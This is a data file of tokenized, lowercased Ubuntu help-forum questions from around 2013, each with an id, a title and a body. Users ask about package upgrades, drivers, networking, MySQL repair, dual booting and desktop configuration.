265630	12.04 upgrade libav from 53 to 54	i am using the latest release of blender 2.66 on 12.04 from the command line . it is looking for libavformat.so.54 but i only seem to have libavformat.so.53 installed , and cant find a way to upgrade to the 54 release . trying apt-get upgrade does n't seem to get me anywhere . i 'm a bit of a noob at all things ubuntu i 'm afraid
265632	touchpad gestures do n't work on dell xps 15 l521x	i 'm trying to get multi-touch gestures working on my dell xps 15 . two finger scrolling works but three or four finger gestures do not . i know that the touchpad is capable of multi-touch gestures because it works fine in windows . i 've tried several things already : installing touchegg from the repository installing touchegg from source installing sputnik kernel and policykit updates from sputnik ppas the first fails with a segmentation fault when run , the second gives errors during compile about missing files , and the third installed fine but nothing changed . compilation errors can be seen here .
265633	xnoise error - gst error parsed : configured audiosink audiobin is not working	as you can see from the subject , i am getting an error from the latest version of xnoise after install . i have tried installing gstreamer 1.0 good , bad and ugly plugins . i am using ubuntu 12.10 64-bit . any ideas as to a solution ?
265634	i chose to download the 32-bit version , but it downloads the 64-bit version instead . why ?	i had it installed and running last night , but i could tell it was n't 32-bit cause when installing the adobe flash player , it said i had a 64-bit os . i uninstalled it , then downloaded it again , then installed it again , but it 's saying that this is the filename : ubuntu-12.10-desktop-amd64.iso.torrent why ? i want the correct version .
265635	a simple 4 desktop kde	i just installed kde , it has a lot of options . what i want is 4 simple desktops that i can switch between . each desktop should have it 's own icons to run particular applications and programs , such as program development , communications , writing , etc . i do n't need , or want 'activities ' .
265636	hiding a 'removable device '	i have my downloads folder mounted as a tmpfs , achieved by putting this line into fstab : tmpfs /home/sam/downloads tmpfs defaults , noatime , mode=1777 0 0 however , one unfortunate side effect is that this folder now appears in the unity launcher as a removable drive , and in the side pane of nautilus as well . is there any way i can tell ubuntu that it 's not something i want attention drawn to , and that it 's just another normal folder ?
265637	wired network not working dell 17r se	wired network not working ; it shows connected to network but i get no internet access.. ! system dell 17r se output of lspci -nnk | grep -iea3 `` ( network|ethernet|wireless|broadcom ) '' lspci -nnk | grep -iea3 `` ( network|ethernet|wireless|broadcom ) '' 02:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 2230 [ 8086:0887 ] ( rev c4 ) subsystem : intel corporation centrino wireless-n 2230 bgn [ 8086:4462 ] kernel driver in use : iwlwifi kernel modules : iwlwifi 03:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 05 ) subsystem : dell device [ 1028:0578 ] kernel driver in use : r8169 kernel modules : r8169 output of ifconfig -a eth1 link encap : ethernet hwaddr 5c : f9 : dd:50:6a : ae up broadcast multicast mtu:1500 metric:1 rx packets:13083 errors:0 dropped:0 overruns:0 frame:0 tx packets:761 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1229231 ( 1.2 mb ) tx bytes:90241 ( 90.2 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:3610 errors:0 dropped:0 overruns:0 frame:0 tx packets:3610 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:498516 ( 498.5 kb ) tx bytes:498516 ( 498.5 kb ) wlan1 link encap : ethernet hwaddr 84 : a6 : c8 : be:66:62 inet addr:192.168.129.101 bcast:192.168.129.255 mask:255.255.255.0 inet6 addr : fe80 : :86a6 : c8ff : febe:6662/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:47879 errors:0 dropped:0 overruns:0 frame:0 tx packets:46247 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:55790608 ( 55.7 mb ) tx bytes:6349692 ( 6.3 mb )
265641	how to open a folder ( with gui ) from terminal ?	i want to place a link/shortcut/launcher in my unity panel ( ubuntu 12.10 ) . i followed this tutorial on handytutorial.com to create a custom launcher and drag it to the panel . i just need to know which command do i have to input . is this possible ?
265643	bind one mouse button to another	the my middle mouse button is not particularly responsive , and i have several completely unused side buttons , and would prefer to map one of those to be interpreted as the middle button . there are plenty of questions here about mapping buttons to keyboard sequences and window events , but nothing about how to make one button be interpreted as a different mouse button . ( i do n't need to swap buttons , i just want to map one over the other ) .
265644	dual boot surface pro with ubuntu ?	how could i setup a dual boot for ubuntu and windows 8 on my microsoft surface pro with 128 gb . note : my dual boot solution is below .
265647	custom paper size = processing - not connected ?	i am trying to print a custom paper size of 105.00 inches x 23.39 inches ( the gldt for my office : d ) . whenever i try a custom paper size , the job sits in the queue with the message processing - not connected ? if i print to a standard paper size , it prints no problem . i am printing to an epson stylus pro 9900 and have tried ipp , lpd , and socket 9100 works best , but still no go on custom paper size jobs with any of these . i have tried a variety of custom sizes . printing is not a problem when selecting existing paper sizes . i am using the only available drivers which seem to be available epson stylus pro 9900 - cups+gutenprint v5.2.8-pre1 and come in 12.04 no problem . the only manual solution i can come up with is to edit the picture and make separate pages and print them out to scale as much as possible and piece them together ... bleh . anyone aware of a fix ? i did much rather have a working solution than manual labor . thanks .
265648	vaapi and amd\intel hybrid video	i have amd\intel hybrid video cards , ubuntu 12.10 , catalyst 13.2b7 . vaapi uses only the intel drivers , i do n't know why . and i ca n't use hardware acceleration when hybrid graphics is on . i have the xvba-va-driver installed .
265649	problem with hd video playback ( amd radeon hd 6320 )	i have asus 1225b e-450 with amd radeon hd 6320 + ubuntu 12.10 . the problem consist in the video , it is so slow when playing 720p and 1080p . proprietary drivers are installed . in what could be the problem ?
265657	alternative for csi etabs	hi i just wanted now an alternative for etabs program in ubuntu . etabs is a civil engineering program that design and analyse steel and concrete structures using finite element method . there is more information here
265660	why does emptying the rubbish bin in nautilus take so long ?	for the purpose of this question , `` large directory '' means for example a linux kernel git repository , or the chromium source . if i rm -rf a large directory like this from the shell , it is deleted in only a couple of seconds at most . if i move it to trash first and then empty the trash , the first operation takes under a second , then the actual delete takes several minutes ( we are talking double figures . ) why is emptying the trash so slow ? what is it doing when it says `` preparing . '' how much preparation does it actually take to run rm -rf ~/.local/share/trash/ ?
265661	publish from shotwell to piwigo	i 'm using kubuntu 12.10 and i want to publish from shotwell to piwigo . the plugin is activated in the settings but in the online-accounts i ca n't select piwigo . how can i configure and select piwigo to publish ?
265666	how do i avoid having to unlock twice when using xtrlock ?	i 've installed xtrlock on ubuntu 12.04 . i run it manually from the command line in the evening , when i want to lock the keyboard/mouse but still leave the screen active . when i come back the next morning and enter my password , the screen immediately goes black , and then i 'm presented with the normal ubuntu unlock screen . how can i prevent the normal lock from happening after i 've unlocked xtrlock ?
265668	ubuntu touch for iphones , ipods and ipads ?	is there any sign of ubuntu touch for ithingys in the near future ?
265671	do i have to partition the drive in windows before installing ubuntu ?	very quick and simple question but just want to make sure before i go ahead and install . i understand that ubuntu 12.04.2 comes with the necessary keys to install alongside windows 8 with uefi and secureboot . my question is can i just install via cd from boot and choose install alongside windows and choose partition size in this setup or do i have to partition the drive in windows before installing ubuntu ?
265680	ubuntu rolling release model	canonical opened a debate on wether or not ubuntu will switch to a rolling release model . what does rolling release model actually mean ? will there be a 13.04 release ?
265685	how to reinstall mysql ?	a software upgrade broke , among other things , mysql and i have not been able to get it back up yet . suspected cause : i had a near-full boot disk ; the upgrade filled up the disk before completing and thus left everything in a mess . i have given the system more disk and moved /var to its own partition . i am still unsuccessfully trying to revive mysql . below is what i attempted so far ( all as root ) . first , mysql does not start ( 443 ) . attempts to fix ( 444 , 445 ) fail . attempts to remove mysql and ( ? ) apparmor fail ( 446 , 7 , 8 ) . a more energetic attempt to remove mysql seems to succeed ( 449 ) and the previous errors are no longer seen ( 450 , 1 , 2 ) . mysql ca n't be reconfigured because it 's no longer there ( 453 ) but attempting to reinstall it gives back the old error messages and we 're back to square one ( 454 ) . i also checked this question ( even though in my case it did not break because of an upgrade to 12.04 : it was already working on 12.10 ) fixing broken myslq-server package after upgrade to 12.04 and tried the suggestions in there ( 458 , 461 , 462 ) to no avail . what else should i do ? this is on 3.5.0-25-generic # 39-ubuntu smp mon feb 25 18:26:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux 443 service mysql start start : job failed to start 444 dpkg-reconfigure mysql-server-5.5 /usr/sbin/dpkg-reconfigure : mysql-server-5.5 is broken or not fully installed 445 apt-get -f install ... setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 446 apt-get remove mysql-server ... removing mysql-server ... setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 447 apt-get remove apparmor ... package 'apparmor ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 448 apt-get remove mysql-server reading package lists ... done building dependency tree reading state information ... done package 'mysql-server ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 449 dpkg -r mysql-server-5.5 ( reading database ... 322156 files and directories currently installed . ) removing mysql-server-5.5 ... processing triggers for man-db ... processing triggers for ureadahead ... 450 apt-get remove mysql-server reading package lists ... done building dependency tree reading state information ... done package 'mysql-server ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 451 apt-get remove apparmor reading package lists ... done building dependency tree reading state information ... done package 'apparmor ' is not installed , so not removed 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 452 apt-get -f install reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 453 dpkg-reconfigure mysql-server-5.5 /usr/sbin/dpkg-reconfigure : mysql-server-5.5 is broken or not fully installed 454 apt-get install mysql-server reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : mysql-server-5.5 suggested packages : tinyca mailx the following new packages will be installed : mysql-server mysql-server-5.5 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/8,851 kb of archives . after this operation , 32.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? preconfiguring packages ... selecting previously unselected package mysql-server-5.5 . ( reading database ... 322081 files and directories currently installed . ) unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.29-0ubuntu0.12.10.1_amd64.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.29-0ubuntu0.12.10.1_all.deb ) ... processing triggers for ureadahead ... processing triggers for man-db ... setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : mysql-server-5.5 mysql-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 458 apt-get remove -- purge mysql-server reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : mysql-server* 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 116 kb disk space will be freed . do you want to continue [ y/n ] ? ( reading database ... 322159 files and directories currently installed . ) removing mysql-server ... setting up mysql-server-5.5 ( 5.5.29-0ubuntu0.12.10.1 ) ... start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : mysql-server-5.5 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) 461 touch /etc/apparmor.d/local/usr.sbin.mysqld ( no output ) 462 service mysql start start : job failed to start
265689	increase size of wubi install	i want to increase the disk space for ubuntu that i installed using wubi . i followed the instructions in https : //help.ubuntu.com/community/resizewubidisk . unfortunately , these commands could not be executed : du -h -- apparent-size /media/win/ubuntu/disks/root.disk fsck -f /media/win/ubuntu/disks/root.disk the error message tells me : can not access `/media/win/ubuntu/disks/root.disk ' : no such file or directory
265691	sharing /home partition between linux oss	i 've been using ubuntu as my main os for a while , but i read about elementary os and i wanted to try it so i installed it . i wanted to share /home partition between both oss but i forgot to do it when installing , so i let it finish the installation process and then proceeded to change fstab . too bad that when i finished the modification and rebooted to apply the changes it broke elementary 's beauty ui ! it was showing me an ugly one -- i think it was the x11 -- so i decided to reinstall sharing partitions from the beginning just in case it would finally work ... but it did n't . i think this is caused by sharing /home partition because before i changed fstab it worked nicely , but not after . maybe this is related to some ui information ubuntu saves in the ~ directory ? well , i do n't know , but the fact is that there 's something that 's interfering with elementary ui . can you think of anything that would cause this -- and how to fix it ? thanks in advance .
265692	why is minetest outdated in the ubuntu repositories ?	the game minetest in the ubuntu repositories is version 0.3.1 it has no been nearly a year since this release and version 0.4.5 has recently come out . is there any reason why this is ?
265693	could not calculate the upgrade from 10.04 to 12.04	could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu if none of this applies , then please report this bug using the command 'ubuntu-bug update-manager ' in a terminal .
265694	error when using `` open with skydrive '' in gnome-shell documents ?	so , i have just setup my custom domain through domains.live.com . i have the docs etc working , i can sign in at office.com and view/create/upload documents , and the account is setup in gnome-shells online accounts . the issue i am having is trying to open the document in skydrive . if the document is from google , using open with google docs works fine but if it is from skydrive using open with skydrive yields this in the terminal : js log : unable to show uri windows-live : skydrive : file.0d7a9b30e410fbc8.d7a9b30e410fbc8 ! 111 : gio.ioerrorenum : the specified location is not supported is this a bug that should be reported or am i doing omething wrong ?
265696	cpu fan kicks in to full gear when i try to install ubuntu 12.10 or lts	whenever i try to install ( dual boot with windows 7 ) both versions of ubuntu desktop on my pc the cpu fan starts spinning so fast that i could n't even go through the installation for fear of my cpu exploding . in windows 7 , the temp reaches 25-30 idle and 30-45 under full load . i tried installing through wubi and by burning it to usb drive . both wield the same results . i would appreciate any help . i 'm a complete noob so take it easy one me . intel core i5 2500 @ 3.30ghz 4.00 gb dual-channel ddr3 @ 668mhz ( 9-9-9-24 ) motherboard asustek computer inc. p8z68-v lx ( lga1155 ) graphics amd radeon hd 6850 ( sapphire/pcpartner )
265697	how to make postfix use new ip address ?	i 'm using the postfix mail server and i have 6 ips available . i 'd like to use another ip to it with my pricipal ip . how can i do this ? for example : main ip : 66.66.66.66 other ip : 66.66.66.67
265700	how to give priority to auto-mount on boot in ubuntu 12.10 ?	one of those things that i like in ubuntu 12.10 , is that for some reason my ntfs partition is automatically mounted on boot , without having to use some application like ntfs-config . however , it 's not mounted `` when i need '' , because ( for example ) , i have a symbolic link of my dropbox folder ( which is originally placed in that ntfs partition ) . therefore , when i login , the dropbox is started first than the ntfs filesystem is mounted , and i find that error that the dropbox folder is not found . if i exit dropbox and start again , it works fine then ( because the filesystem is mounted by then ) . how can i do to prevent this ?
265702	asynchronous logging via rsyslogd ( 8 ) and write buffer increase	on a pretty high traffic web site running in virtual containers ( vmware ) and lacking local storage , we 've managed to increase throughput ( requests per second ) significantly by switching from logging directly into log-files ( which reside on remote network storage ) to rsyslogd . essentially we 've switched from synchronous to asynchronous logging . the web server workers write using syslog ( 3 ) to some memory buffer and rsyslogd ( 8 ) sends the data to an actual file in parallel , and at its own pace , so processes do n't block on io when logging . so far so good . the problem is that ocassionally rsyslogd is prevented from writing ( e.g . a momentary/prolonged network outage ) and the incoming buffer quickly fills up . my questions are : can a client ever block when writing to rsyslogd using syslog ( 3 ) ? is there a way to look at rsyslogd stats , e.g . how big/full is the buffer ? is there a way to increase the size of the rsyslogd incoming buffer ?
265703	how to do a pbuilder-dist build with dependencies in a ppa ?	i 'm trying to build a package for my ppa that uses packages from two other ppas . i want to do a test build using pbuilder-dist . i have done this before and i know that i need a combination of : othermirror in ~/.pbuilderrc -- override-config , but i 'm not sure when to add it to the pbuilder-dist call pbuilder-dist raring update and pbuilder-dist raring build < pkg > .dsc maybe other things ? can someone give a detailed description ? i have tried different combinations , but nothing seems to work . the two ppas i need are ppa : gnome3-team/gnome3 and ppa : tkluck/gnome3 . thanks !
265704	how do i undo ctrl+alt+backspace ?	i 'm installing ubuntu from wubi and i pressed that and it went to a full screen cmd prompt looking thing and i think the ctrl+alt+backspace did it .
265705	how to disable dedicated gpu in ubuntu 12.10 ?	i want to completely disable my nvidia gt610m card , and let ubuntu rely only on the hd4000 . how can i achieve that ?
265708	ubuntu does n't want to turn off	i have ubuntu 12.04 with nmap and metasploit installed on it . my problem is when i try to shutdown , ubuntu refuses to turn off . when i check the running processes , i see that postgresql 9.1 is still in `` stopping process '' ( i guess ) . the next time i try to stop postgresql before shutdown , the case is still not solved . after a frustrated time , i start to think to uninstall the metasploit with command ./uninstall but the result is still the same . is there anyone who know how to solve this problem ?
265709	javac and javaws works but not java	javac and javaws work from the command line but java for running a .class wo n't work . i have updated my path , set java_home , and checked links . when i type java myclass i get `` java '' found in default-jre and a few others . when i run java -version the same thing , `` java '' found in default-jre . i 'm trying to use sun java jdk1.7.0 and the command line . it appears that ubuntu thinks that java jdk1.7.0 is n't installed . any help will be greatly appreciated .
265710	wireless card works under network manager but not with wicd	i have a tp-link wn821n and two computers , both with 12.04 lts and 12.04.2 lts . the computer with 12.04 does not have graphical environment , i tried network-manager but did not work so i installed wicd ( with wicd-cli and wicd-curses ) . the former , with 12.04.2 does have a graphical interface . i can easily connect to an ad-hoc with the network-manager in the graphical interface , but i cant connect to an ad-hoc network using the same wireless card in the wicd computer . the problem is , the device appears with lsusb ( atheros ... ) , if i run nmcli it says the device is unavailable ( although the wired network works perfectly ) and when using wicd it does n't go any further from the `` getting ip address.. ''
265715	how can i change chrome unstable to chrome beta	i installed chrome unstable from the chrome site . it was .deb package but because it has problems with some sites , i want to change to chrome beta . i want to change because the previous version of unstable , which is now the beta version worked correctly with no problem . so how can i remove unstable and install beta since every time i try to install it it gives an error .
265716	moving '/home ' from a partition to 'real ' /home	having put /home on a separate partition when installing and then added another version of ubuntu to a third partition and used the /home in common , i see the error of my ways . i want to put both /homes back in their os trees and repurpose the old common 'home ' partition . i am trying to follow https : //help.ubuntu.com/community/partitioning/home/moving and how to undo move /home into /old_home ? i know the uuids of all partitions and can edit the fstab and # -ed the /home partition . ca n't log into the normal gui as ' can not update iceauthority file ' . after restarting in recovery mode i see /home has no link to the far home folder . i ca n't make a new dir ( ro file system ) and ca n't useradd any username ( ' can not lock /etc/passwd ' ) . my problem is that my only user 's home directory is a subdirectory of /home - where i want to move it to , and a link is already in operation with that username ! how do i clean this mess up without yet another reinstall , please ?
265717	repair degraded/failed raid1 ubuntu 10.4	my search fu and brain are exhausted , i need to ask for some help . our company server was taken out of the building for about 5 months while some restructuring was done . when returned from sitting unplugged that whole time on power-up the system reported that they raid1 array was degraded . both drives report to be healthy . when plugged into a different computer as a slave , i see one has our intact filesystem , and the other has nothing in /home or /var/www only one of the two claims to be bootable , and unfortunately that is the one with out the files . i was able to get the system to boot to prompt once , i notices that tomcat and apache2 loaded , apparmor tried and failed . but once at the prompt none of the utilitys { mdadm , fsck , fdisk , etc } were available when booting i see [ no int 13 drives ] and [ bios not loaded ] as errors and then [ insert system disc ] error , i 've tried all combinations of either or both drives in both slots . what i am hoping is for a way to fix/install a boot sector on the drive with the file tree . sorry if this was n't very concise , i will try to provide any further requested information , i have n't much slept in a few days working on this .
265718	help needed ! nvidia/intel graphics driver installation problem on 12.10	i 'm using ubuntu 12.10 . my pc is n't auto detecting my drivers , i 've tried installing the graphic drivers from the additional drivers section , but it shows nothing . when i open up the `` about this computer '' tab , i see that my graphics driver is unknown and my experience is standard . after referring to a lot of forums , i saw that i had to run this command , lspci | grep vga i see this output 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 630m ] ( rev a1 ) i have tried downloading nvidia 's graphic driver file , but it 's a .run file and i do n't know how to install it . how do i fix this ?
265719	what is a disc image burner ?	people help me please , it 's says that a disc image burner was n't found . what is this ?
265725	google chrome wo n't install . help ?	i downloaded chrome from the official page . once it was done downloading , i double clicked it to start the installation . it took me to ubuntu 's software center , and i clicked `` install . '' once i clicked that , the very beginning chunk of the orange bar always appears , but then just stops for no reason . help please ?
265726	uninstalling ubuntu or unhiding partition	i have 3 disks in my machine . i installed ubuntu in one of them ( 2 partitions ) but it is impossible to `` see '' the partition where i installed ubuntu from the other disks ( sysop w7 or winxp ) so i tried a partition program but it deleted the empty partition , only . at the end of the hd is 320g but now it 's only 232g . how can i unhide this partition or uninstall ubuntu ? thank 's in advance .
265735	ca n't install ubuntu 12.04 - ca n't reconize partitions	here 's my fdisk -lu disk identifier : 0xbbc58b91 device boot start end blocks id system /dev/sdb1 * 2048 1607679 802816 7 hpfs/ntfs/exfat /dev/sdb2 1607680 432273407 215332864 7 hpfs/ntfs/exfat /dev/sdb3 946051072 976771071 15360000 27 hidden ntfs winre /dev/sdb4 432273408 946051071 256888832 83 linux partition table entries are not in disk order disk /dev/sdc : 31.0 gb , 30992891904 bytes 255 heads , 63 sectors/track , 3768 cylinders , total 60532992 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0217934c device boot start end blocks id system /dev/sdc1 * 63 60532991 30266464+ c w95 fat32 ( lba ) what do you think ? thank you ! !
265739	hit the lowercase d alone then shows desktop	the question is when i hit the lowercase 'd ' in whatever window and then ubuntu hides all windows and shows the desktop . i installed ubuntu 12.10 . the root and myself account work everything well , but when i create one account again , that account encounted this issue . i have tried the compizconfig tool and i also checked the keyboard shortcuts , and seems to not useful . i 'm not familiar with ubuntu configure . can anyone help me ? thanks a lot !
265748	how to protect ubuntu12.10 from viruses , spywares , spamware and intruders ?	i have been using windows os for a long time and there i needed to install a separate anti virus program ( included with firewall , anti spam ) etc.. with my mentor 's recommendation , i have replaced windows with ubuntu12.10 64 bit . i really enjoyed the system . its better than windows os . i am a java developer , so i need to have apache tomcat , jboss and glassfish installed along with mysql . for my job requirement , i need to google for above java develoment and end up getting into many blogs . i have searched for protecting ubuntu , but they all end up with configuring the firewall . i really have no knowledge about how firewall needs to be configured according to my requirements . do i also need to have an antivirus program on ubuntu . can anybody guide me about how can i secure the ubuntu 12.10 64bit system . your advice matters to me a lot .
265750	dualboot windows 8 and ubuntu 12.10 w/ uefi	i recently purchased a toshiba laptop , that had windows 8 pre-installed . as windows 8 is awful , i decided to attempt to dualboot ubuntu . did some research , and found out that it is not as simple with uefi enabled . if there is some way to keep uefi enabled ( unless it is completely pointless ) i would love a step-by-step tutorial . either way , i could really appreciate some help as i have seen multiple methods , all of which are different . if you require any more information about my system , feel free to ask . thanks in advance . btw i am a first time ubuntu installed , so like i said step-by-step instructions would be appreciated . seth , like i said i have n't installed ubuntu on a system before , so i have n't even gotten to that point .
265752	problem with login screen and sudo comand	i 'm new to linux world , infact i have installed ubuntu 12.04 yesterday on my computer . i have dual-core processor , 2gb ram , 500gb harddisk , no graphics card and xp in parallel . i 'm facing so many problems in ubuntu : 1 ) login screen is on left side and only half of it is visible . 2 ) i logged in with password which i had set while installing ubuntu but still it is showing me guest-hbicaz @ somthing 3 ) sudo command is not working . when i tried to install gedit using this command `` sudo apt-get install gedit '' . it is giving me these errors sudo : unable to change to sudoers gid : operation not permitted sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 118 , -1 , -1 ] : operation not permitted i 'm new to ubuntu . i have searched to solve the login screen problem but i cant solve because sudo command is not working
265753	how to change date/time format to english ?	i have installed ubuntu 13.04 and set my local time/date and its working , the only thing thats bugging me is that i can not change it to english . i would like to do this because its hard to read and its not showing in proper format in terminal , please view the screenshot below . show in proper formate not showing in proper format in terminal how can i change my date/time to english format and keep the local time ?
265754	where can i find testing version of ubuntu in development	i am looking for testing version of ubuntu 13.04 , i have looked in this question alternate iso image for current unstable ( alpha/beta ) releases but the links in the answer did not show me the place to find the images for ubuntu 13.04 . i am looking for the testing images , like iso to download . are there images for this version , like `` daily '' images ?
265756	trying to install from usb- ubuntu 12.04	i have a netbook running windows xp . i 'm trying to install ubuntu on it but am running into the same error message that 's described on the following post : hard disk error i basically booted from usb and then once ubuntu was loaded , i tried to install by creating a separate partition . it failed with the hard disk error . now i 'm in a situation where windows xp wo n't start either . i just get a flashing white cursor on my screen . in the above post , one of the suggestions is to check out the disk utility in ubuntu . i 'd like to just format the drive altogether and only have ubuntu on it ... but i have a basic question if i format the drive , will the computer still have the smarts to boot from usb so that i can then retry installing the ubuntu os ? sorry for the remedial questions but i have n't tried anything like this before . i 've always bought windows machines that came pre-installed ... thanks in advance for the help .
265757	nautilus description versus /usr/share/applications file directory	when using nautilus and i navigate to the /usr/share/applications directory i get a listing of the meta data that is extracted from all of the .desktop files that live in that directory . so the file in my example called `` oracle java 7 runtime '' in nautilus translates to the file jb-java.desktop which i took a wild guess at . in nautilus the properties dialog does not reveal the name of that file , so its a hit and miss approach to get the file name . is there a better way ? short of looking for the string `` oracle java 7 runtime '' in all of the files in the directory which is a bit clumsy .
265759	how to create a image backup of the ubuntu server	i 'm looking for a method to do system image backup on ubuntu server , such as aix mksysb command , which allow us to boot the system from tape or dvd in order to restore the operating system and its configurations . somebody can help me ? thank you in advance .
265761	loading extension glx : screen freezes	i installed ubuntu server edition 12.10 on a server ( with 16 gb ram and 500gb hard disk ) . the installation was successful , after which i tried installing gui using the below command sudo apt-get install ubuntu-desktop now , the problem is i 'm not able to start gui from the terminal once i login . when i do startx , screen freezes and nothing works . in the terminal , it displays loading extension glx and stops . i did grep ee /var/log/xorg.0.log which displayed the following lines . [ 247.145 ] ( ee ) open /dev/dri/card ) : no such file or directory why does this error occur . how can i solve this .
265762	what flavour of ubuntu ( 32-bit/64-bit ) do i get when i install using windows installer	i 've installed ubuntu on my 64-bit system using windows installer . what version i might 've got ? ?
265764	unable to install jdk 1.6	when executing the following : sudo apt-get install openjdk-6-jre executing displays following : reading package lists ... done building dependency tree reading state information ... done package openjdk-6-jre is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'openjdk-6-jre ' has no installation candidate
265765	what is the difference between versions from a development perspective ?	some software ( eg veracity , ultraedit ) has packages for ubuntu 10 and another for 11 and another for 12 . what would differences in ubuntu versions would account for this ? did the location of files change or something ?
265767	video card zoltec nvida gtx 650 woes	hello all i am running ubuntu 12.04 . i just installed a new video card zoltec nvida gtx 650 . i got drivers from the systems settings with the drivers option in the menu . is there a tool i can download or terminal command to change the image on screen . the drivers have only one resolution . the side unity bar is cut in half and i ca n't see the top bar . any help would be grateful .
265777	open kiosk whitelist not working	i 'm trying to setup the standalone version of open kiosk with the following whitelist : allowed [ *.google.com , all , javascript ] ; the problem is that i 'm still able to open other websites , e.g . http : //www.ubuntu.com . can anyone help me ?
265782	bluetooth dun connect with the command line ?	i use my mobile ( samsung corby gt-s3653 ) to connect to the internet and my mobile network gets automatically disconnected periodically when i 'm using it for gprs so i always have to click that notification icon and click `` tata docomo internet '' for reconnecting it . sometimes i have to repeat the process a couple of times until it properly connects . i want to know if there 's a way to automate this process with the command line ( or any other program ) so i do n't have to keep doing this all the time it disconnects .
265783	how can i bypass governmental censorship of certain websites , for instance in iran ?	i live in iran and as you know there 's a blocking system here . the people here use vpns to access websites . i did the same . but days ago vpns ( pptp , l2tp , sstp ) ports was blocked too . the alternatives was freegate and free software similar to it . people mostly use these software in windows . but i want a thing which supports ubuntu too . furthermore i know that port 443 is not filtered . do you think is it possible to use openvpn in this situation ?
265786	completed installing ubuntu 12.10 but could n't boot to ubuntu	i tried to install the dual-os , ubuntu and windows 8 by using a usb drive . i followed every step and finished installing ubuntu , then it asked me to restart computer . so i did and after reboot i took me to the same screen when i first want to download ubuntu . only show . try ubuntu without installing install ubuntu ... . is is supposed to show me a selection of either ubuntu or windows to run ? i have ubuntu run along with windows on my laptop , and i never had this problem .
265787	are efforts to run ubuntu on the nexus 7 dead ? ( not including ubuntu touch )	is the project `` dead '' ? no nexus-specific changes in the last days . where can i get information like ambitions , roadmap ?
